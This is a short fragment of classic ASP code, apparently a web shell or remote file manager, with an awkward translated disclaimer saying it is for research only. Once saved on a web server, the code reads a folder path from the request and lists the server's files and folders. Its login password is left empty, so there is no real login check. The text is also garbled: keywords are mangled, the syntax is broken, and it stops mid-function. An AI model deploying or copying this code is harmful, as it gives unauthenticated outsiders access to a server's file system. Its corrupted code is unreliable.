The following code is saved as * .asp in the virtual directory to execute ~
'Copyright Notice: This code is for learning research only, and I am not responsible for any consequences caused by this procedure. Not available for commercial use without written permission. 'QQ: 103895'Email:'http: //ASP2004.NET
Server.scripttimeout = 999Action = request ("action") TEMP = Split (Request.ServerVariables ("URL"), "/") URL = Temp (Ubound (Temp))
Const pass = "" 'login password
'Login verification
SET FSO = CREATEOBJECT ("scripting.filesystemObject") Path = Request ("foldername") if path = "" "". ") SHOWFolderList (PATH) SET FSO = Nothing
'List the files and folders
Function ShowFolderList (Folderspec) Temp = Request.ServerVariables ("http_referer") TEMP = Left (Temp, INSTRREV (Temp, "/")) TEMP1 = LEN (Folderspec) - LEN (Server.MAppath ("./")) 1 IF TEMP1> 0 THEN TEMP1 = Right (Folderspec, CINT (TEMP1)) "/" Elseif Temp1 = -1 TEMP1 = "" End if Tempurl = Temp Replace (TEMP1, "/", "/") Uppath = "./" Replace (TEMP1, "/", "/") Upfolderspec = fso.getParentFoldername (Folderspec & "/") Set f = fso.getfolder (folderspec)%>